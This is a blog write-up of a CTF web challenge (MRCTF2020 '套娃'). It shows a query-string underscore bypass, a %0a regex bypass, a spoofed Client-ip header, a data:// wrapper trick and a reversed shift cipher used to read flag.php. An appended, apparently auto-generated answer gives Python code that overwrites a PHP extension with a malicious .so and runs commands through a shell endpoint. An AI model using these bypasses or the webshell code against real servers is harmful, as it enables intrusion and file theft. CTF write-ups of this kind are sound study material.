[MRCTF2020]套娃 字符串解析特性bypass及ascii移位

<!--
//1st
$query = $_SERVER['QUERY_STRING'];

 if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){
    die('Y0u are So cutE!');
}
 if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){
    echo "you are going to the next ~";
}
!-->

了解一下$_SERVER['QUERY_STRING']详解 $_SERVER 函数中QUERY_STRING和REQUEST_URI区别 - 忘忧般若汤 - 博客园

sbustr_count函数返回_在$query中的次数,%5f是_的url编码,第一个if语句意思就是:如果$query中有_则会die

第二个if语句,用get方法传b_u_p_t参数的值不能等于23333,对该值正则表达式/^2333$/意思是首尾都是2333,要同时成立

明显这里要用到字符串解析的特性了利用PHP的字符串解析特性Bypass - FreeBuf网络安全行业门户

_可以用空格来代替,绕过正则的话就要用到%0a了,因为在字符串中换行符默认为结尾,因此构造b%20u%20p%20t=23333%0a

继续进入

注释了一大串不懂得字符,经过查明是用来装逼的js字符,直接控制台运行即可 

叫我们用post方法传Merak进去 

error_reporting(0);  
include 'takeip.php'; 
ini_set('open_basedir','.');  
include 'flag.php'; 

if(isset($_POST['Merak'])){  
    highlight_file(__FILE__);  
    die();  
}  


function change($v){  
    $v = base64_decode($v);  
    $re = '';  
    for($i=0;$i<strlen($v);$i++){  
        $re .= chr ( ord ($v[$i]) + $i*2 );  
    }  
    return $re;  
} 
echo 'Local access only!'."<br/>"; 
$ip = getIp(); 
if($ip!='127.0.0.1') 
echo "Sorry,you don't have permission!  Your ip is :".$ip; 
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' ){ 
echo "Your REQUEST is:".change($_GET['file']); 
echo file_get_contents(change($_GET['file'])); } 

发现了一个flag.php文件,以及最后面有个file_get_contents(change($_GET['file'])); } ,肯定是绕过中间的阻碍,将flag.php传入进去

先不看函数,直接看下面,一个if语句叫我们用本地登录,用Client-ip=127.0.0.1即可绕过(但我不清楚为什么X-Forwarded-For为什么不行,问了一下别人是说要看服务器的判断机制)

当你本地登陆成功的同时file_get_contents($_GET['2333']) === 'todat is a happy day',明显利用伪协议data即可2333=data://text/plain,todat is a happy day

现在就要看change函数了,因为file参数是传到change函数里面去的

function change($v){  
    $v = base64_decode($v);  
    $re = '';  
    for($i=0;$i<strlen($v);$i++){  
        $re .= chr ( ord ($v[$i]) + $i*2 );  
    }  
    return $re;  
} 

将传来的参数进行base64解码,先将字符ord转化为ascii并进行加$i*2,再用chr转化为字符返回,

我想不到如何一次性将这个函数反过来写,我只能自己手工代码了

通过自己修改$i的值和下面的字符来将flag.php移位前的字符给换算出来 

换算出来结果fj]a&f\b,经过base64编码后ZmpdYSZmXGI=

 这样我们进行传参即可

 很有意思的一个自己反写代码,以及了解到装逼的js代码

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFSHOW套shell是一种常见的利用技术,用于在Web应用程序中执行命令和控制服务器。根据提供的引用内容,以下是一种使用CTFSHOW套shell的方法: 1. 首先,需要获取CTFSHOW扩展。可以通过运行命令`php ext_skel.php --ext ctfshow --std`来生成该扩展的目录。 2. 进入生成的目录,并编辑.c文件,根据需要进行修改。 3. 执行以下命令来编译和安装扩展:`phpize ./configure make && make install`。编译完成后,会告知具体的扩展安装位置。 4. 通过发送POST请求,使用CTFSHOW套shell来写入并执行命令。示例代码如下: ```python import requests url = "http://690602f6-e0b4-4a2b-b0e0-b36c4e383275.challenge.ctf.show/" data = {'file': '/usr/local/lib/php/extensions/no-debug-non-zts-20180731/mysqli.so', 'content': open('ctfshow.so', 'rb').read()} requests.post(url + '?a=write', data=data) requests.get(url + '?a=run') ``` 5. 使用CTFSHOW套shell执行命令。可以使用以下命令示例: ```python import requests url = "http://690602f6-e0b4-4a2b-b0e0-b36c4e383275.challenge.ctf.show/" data = {'cmd': 'cat /f*'} requests.post(url + '?a=shell', data=data) ``` 这样,您就可以使用CTFSHOW套shell来执行命令并获取所需的结果了。请注意,使用套shell存在安全风险,应仅在合法和授权的情况下使用。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [CTFSHOW 常用姿势篇(811-820)](https://blog.csdn.net/miuzzx/article/details/124038567)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值